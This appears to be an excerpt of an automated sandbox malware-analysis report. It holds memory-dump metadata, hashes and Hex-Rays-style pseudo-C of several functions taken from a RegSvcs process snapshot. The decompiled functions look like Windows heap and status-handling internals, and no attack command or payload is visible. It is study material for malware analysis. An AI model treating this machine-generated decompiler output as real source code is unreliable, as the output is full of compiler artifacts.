                                          0x013c74b5
                                          0x00000000
                                          0x013c74bb
                                          0x013c74c1
                                          0x013c74c1
                                          0x013c74c4
                                          0x013c74c5
                                          0x013c74c6
                                          0x013c74c7
                                          0x013c74c8
                                          0x013c74cd
                                          0x00000000
                                          0x013c74d3
                                          0x013c74d3
                                          0x013c74d6
                                          0x013c74d8
                                          0x013c74db
                                          0x013c74dd
                                          0x013c74e0
                                          0x013c74e7
                                          0x013c74ee
                                          0x013c74ee
                                          0x013c74f4
                                          0x013c74f9
                                          0x00000000
                                          0x013c74fb
                                          0x013c74fb
                                          0x013c74fd
                                          0x013c7500
                                          0x013c7503
                                          0x013c7505
                                          0x013c7505
                                          0x013c74f9
                                          0x00000000
                                          0x013c74cd
                                          0x013c74b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: 2b7236b09d27ab4ec159699aac8d5de58698ae33affc88e6a1e783cc1dec111b
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: CF518D71600646EFDB16CF18C480A96BBB9FF55708F14C0AAE9089F222E771E946CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01322990 Relevance: .1, Instructions: 133COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E01322990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x13cff00);
				E0134D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x12d1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0133E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x12d1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E013751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x12d166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01322AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01306600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01322C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01322AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01322C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01322ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0134D0D1(_t62);
				goto L28;
			}





















                                          0x01322990
                                          0x01322992
                                          0x01322997
                                          0x013229a3
                                          0x013229a6
                                          0x013229ab
                                          0x013229ad
                                          0x013229b2
                                          0x01365c80
                                          0x013229b8
                                          0x013229b8
                                          0x013229bb
                                          0x013229c0
                                          0x013229c5
                                          0x013229c6
                                          0x013229c6
                                          0x013229cb
                                          0x00000000
                                          0x00000000
                                          0x013229cd
                                          0x013229d0
                                          0x013229d9
                                          0x013229db
                                          0x013229dd
                                          0x01322a7f
                                          0x01322a84
                                          0x01322a87
                                          0x01322a89
                                          0x01365ca1
                                          0x01365ca3
                                          0x00000000
                                          0x01322a8f
                                          0x01322a8f
                                          0x00000000
                                          0x01322a8f
                                          0x00000000
                                          0x013229e3
                                          0x013229e3
                                          0x013229e3
                                          0x00000000
                                          0x013229e3
                                          0x013229dd
                                          0x00000000
                                          0x013229db
                                          0x013229e6
                                          0x013229e9
                                          0x013229eb
                                          0x013229ed
                                          0x013229f3
                                          0x013229f5
                                          0x013229f8
                                          0x013229fa
                                          0x01322a97
                                          0x01322a9a
                                          0x01322a9d
                                          0x01322add
                                          0x00000000
                                          0x01322a9f
                                          0x01322aa2
                                          0x01322aa5
                                          0x01322aa8
                                          0x01322aab
                                          0x01365cab
                                          0x01365caf
                                          0x01365cc5
                                          0x01365cda
                                          0x01365cdc
                                          0x01365cdf
                                          0x01365ce5
                                          0x00000000
                                          0x01365ceb
                                          0x01365ced
                                          0x01365cee
                                          0x00000000
                                          0x01365cee
                                          0x01365cb1
                                          0x01365cb4
                                          0x01365cb9
                                          0x01365cbb
                                          0x00000000
                                          0x01365cbd
                                          0x01365cbd
                                          0x00000000
                                          0x01365cbd
                                          0x01365cbb
                                          0x01322ab1
                                          0x01322ab1
                                          0x01322ac4
                                          0x01322ac6
                                          0x01322ac6
                                          0x00000000
                                          0x01322ac6
                                          0x01322aab
                                          0x00000000
                                          0x01322a00
                                          0x01322a09
                                          0x01322a0e
                                          0x01322a21
                                          0x01322a24
                                          0x01322a35
                                          0x01322a3a
                                          0x01322a3d
                                          0x01322a42
                                          0x01322a59
                                          0x01322a59
                                          0x01322a5c
                                          0x01322a5f
                                          0x01322a5f
                                          0x013229fa
                                          0x013229f3
                                          0x01322a64
                                          0x01322a64
                                          0x01322a6b
                                          0x01322a6b
                                          0x01322a6d
                                          0x01322a72
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26b44c86534a34d53343967cff2823868c4a43255e82eeecb848bdec9cfef2c9
                                          • Instruction ID: 2bfd9e181042d65ddf22ce78a84e834278fe7978798f14abeb7b0381f709ca65
                                          • Opcode Fuzzy Hash: 26b44c86534a34d53343967cff2823868c4a43255e82eeecb848bdec9cfef2c9
                                          • Instruction Fuzzy Hash: 58517B71A0022ADFEF25EF59CC40AEFBBB5BF58358F008165E900AB664C7319952CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01324BAD Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E01324BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x13ed360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E012FCC50(_t86);
					L11:
					return E0133B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x13e8504
				E01312280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0133FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0133B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01314620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E012FCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x13e8504
								E0130FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01324F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                          0x01324bad
                                          0x01324bbf
                                          0x01324bc2
                                          0x01324bc6
                                          0x01324bcd
                                          0x01324bd9
                                          0x013667fe
                                          0x01366800
                                          0x01324ccc
                                          0x01324ccd
                                          0x01324cb7
                                          0x01324cc9
                                          0x01324cc9
                                          0x01324bdf
                                          0x01324be5
                                          0x00000000
                                          0x00000000
                                          0x01324beb
                                          0x01324bef
                                          0x00000000
                                          0x00000000
                                          0x01324bf5
                                          0x01324bf9
                                          0x01324c06
                                          0x01324c0b
                                          0x01324c17
                                          0x01324c1c
                                          0x01324c1f
                                          0x01324c25
                                          0x01324c33
                                          0x01324c3d
                                          0x01324c40
                                          0x01324c43
                                          0x01324c47
                                          0x01324c4d
                                          0x01324c53
                                          0x01324c54
                                          0x01324c55
                                          0x01324c56
                                          0x01324c5b
                                          0x01324c5c
                                          0x01324c63
                                          0x01324c6b
                                          0x00000000
                                          0x00000000
                                          0x01366776
                                          0x01366784
                                          0x01366784
                                          0x0136679f
                                          0x013667a7
                                          0x013667af
                                          0x013667ce
                                          0x00000000
                                          0x013667b1
                                          0x013667b7
                                          0x013667b8
                                          0x013667c1
                                          0x013667d3
                                          0x013667d9
                                          0x013667dd
                                          0x01324c94
                                          0x01324c94
                                          0x01324c98
                                          0x01324c9c
                                          0x01324ca3
                                          0x013667f4
                                          0x013667f4
                                          0x01324cb5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01324cb5
                                          0x01324c79
                                          0x01324c7e
                                          0x01324c89
                                          0x01324c8b
                                          0x01324c8f
                                          0x01324c8f
                                          0x00000000
                                          0x01324c89
                                          0x013667c3
                                          0x00000000
                                          0x013667c3
                                          0x013667af
                                          0x01324c73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7843c11d577576823c3f0a3dc3896274021c77a7cfcc00f9767fea23640c7f56
                                          • Instruction ID: 60de789572499d95cd6caa88d7b6a810e51df0f0f7b76665f4341dd8f8662b21
                                          • Opcode Fuzzy Hash: 7843c11d577576823c3f0a3dc3896274021c77a7cfcc00f9767fea23640c7f56
                                          • Instruction Fuzzy Hash: FF41B571A0022DABDF21EF6CC941FEA77B8AF45754F0140A5E908AB245D774DE84CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01324D3B Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E01324D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x13ed360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0133FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x13e7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0133B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01314620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E012FCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0133B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0133F380(_t67 + 0xc, 0x12d5138, 0x10) == 0) {
								 *0x13e60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01324F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01324E70(0x13e86b0, 0x1325690, 0, 0) != 0) {
					_t46 = E012FCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                          0x01324d3b
                                          0x01324d4d
                                          0x01324d53
                                          0x01324d58
                                          0x01324d65
                                          0x01324d6c
                                          0x01324d71
                                          0x01324d77
                                          0x01324d7f
                                          0x01324d8c
                                          0x01324d8e
                                          0x01324dad
                                          0x01324db0
                                          0x01324db7
                                          0x01324db8
                                          0x01324db9
                                          0x01324dba
                                          0x01324dbb
                                          0x01324dc1
                                          0x01324dc8
                                          0x01324dcc
                                          0x01324dd5
                                          0x01324dde
                                          0x01324ddf
                                          0x01324de0
                                          0x01324de1
                                          0x01324de6
                                          0x01324de7
                                          0x01324de9
                                          0x01324df3
                                          0x00000000
                                          0x00000000
                                          0x01366c7c
                                          0x01366c8a
                                          0x01366c8a
                                          0x01366c9d
                                          0x01366ca7
                                          0x01366cac
                                          0x01366cb2
                                          0x01366cb9
                                          0x00000000
                                          0x01366cbf
                                          0x01366cbf
                                          0x00000000
                                          0x01366cbf
                                          0x01366cb9
                                          0x01324dfb
                                          0x01366ccf
                                          0x01366cd3
                                          0x01324e32
                                          0x01324e39
                                          0x01366ce0
                                          0x01366cf2
                                          0x01366cf2
                                          0x01366ce0
                                          0x01324e3f
                                          0x01324e41
                                          0x01324e51
                                          0x01324e51
                                          0x01324e03
                                          0x01324e03
                                          0x01324e09
                                          0x01324e0f
                                          0x01324e57
                                          0x00000000
                                          0x00000000
                                          0x01324e1b
                                          0x01324e30
                                          0x01324e5b
                                          0x01324e5b
                                          0x00000000
                                          0x01324e30
                                          0x01324e11
                                          0x01324e11
                                          0x01324e16
                                          0x00000000
                                          0x01324e16
                                          0x01324e01
                                          0x00000000
                                          0x01324e01
                                          0x01324da5
                                          0x01366c6b
                                          0x00000000
                                          0x01324dab
                                          0x01324dab
                                          0x00000000
                                          0x01324dab

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d0236cd216e65e50637c969809a38b6c319f3ef1e58d92a96e708ddd7c132ff2
                                          • Instruction ID: a1829b4d68898588448119d6880f1c47ae9f9bb20502a163c9bafd34922fd9ab
                                          • Opcode Fuzzy Hash: d0236cd216e65e50637c969809a38b6c319f3ef1e58d92a96e708ddd7c132ff2
                                          • Instruction Fuzzy Hash: AA41D871A443289FFB32EF18CC81F66BBA9EB54718F044099E9499B285D770DD44CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C2B28 Relevance: .1, Instructions: 129COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E013C2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x13e6110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E01312280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x13e6110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E013C241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E0130FFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E013C3209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E013BA80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E0130FFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E013BA80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x13e6110; // 0x7900493f
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}
























                                          0x013c2b28
                                          0x013c2b30
                                          0x013c2b35
                                          0x013c2b37
                                          0x013c2b3a
                                          0x013c2b3d
                                          0x013c2b44
                                          0x013c2b4d
                                          0x013c2b4d
                                          0x013c2b50
                                          0x013c2b54
                                          0x013c2bb0
                                          0x013c2bbd
                                          0x013c2be8
                                          0x013c2bef
                                          0x013c2bf4
                                          0x013c2bf7
                                          0x013c2bfa
                                          0x013c2bfd
                                          0x013c2c02
                                          0x013c2c02
                                          0x013c2c0f
                                          0x013c2c13
                                          0x013c2c3b
                                          0x013c2c4a
                                          0x013c2c4f
                                          0x013c2c52
                                          0x013c2c52
                                          0x013c2c59
                                          0x013c2c62
                                          0x013c2c62
                                          0x013c2c69
                                          0x013c2c15
                                          0x013c2c18
                                          0x013c2c19
                                          0x013c2c21
                                          0x013c2c29
                                          0x013c2c2f
                                          0x013c2c2f
                                          0x013c2c29
                                          0x013c2bbf
                                          0x013c2bc2
                                          0x013c2bc3
                                          0x013c2bc9
                                          0x013c2bc9
                                          0x013c2c72
                                          0x013c2c72
                                          0x013c2b56
                                          0x013c2b5c
                                          0x013c2b62
                                          0x013c2b64
                                          0x013c2b72
                                          0x013c2b77
                                          0x013c2ba3
                                          0x013c2ba3
                                          0x013c2ba5
                                          0x013c2baa
                                          0x00000000
                                          0x013c2baa
                                          0x013c2b7e
                                          0x013c2b84
                                          0x013c2b86
                                          0x013c2b97
                                          0x013c2b9c
                                          0x013c2b9e
                                          0x013c2b9e
                                          0x00000000
                                          0x013c2b9e
                                          0x013c2b8b
                                          0x013c2b90
                                          0x00000000
                                          0x00000000
                                          0x013c2b95
                                          0x00000000
                                          0x013c2b95
                                          0x013c2b6b
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12c8325f0ea9851a61df03d667cd6387f70134554575e189415ec4f945404be3
                                          • Instruction ID: 12a88c3430a7ddea54a73e9aae143c3a1dbef2cc12fb2f47ef027ec1840610db
                                          • Opcode Fuzzy Hash: 12c8325f0ea9851a61df03d667cd6387f70134554575e189415ec4f945404be3
                                          • Instruction Fuzzy Hash: 1D411A73A105099FD725DF6CC8809BBBBE9EF48B28F05866DE915DB280DA34DD06C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013BAA16 Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013BAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E013BABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E013BAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E013BAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0139CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L013177F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01317D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E013B131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
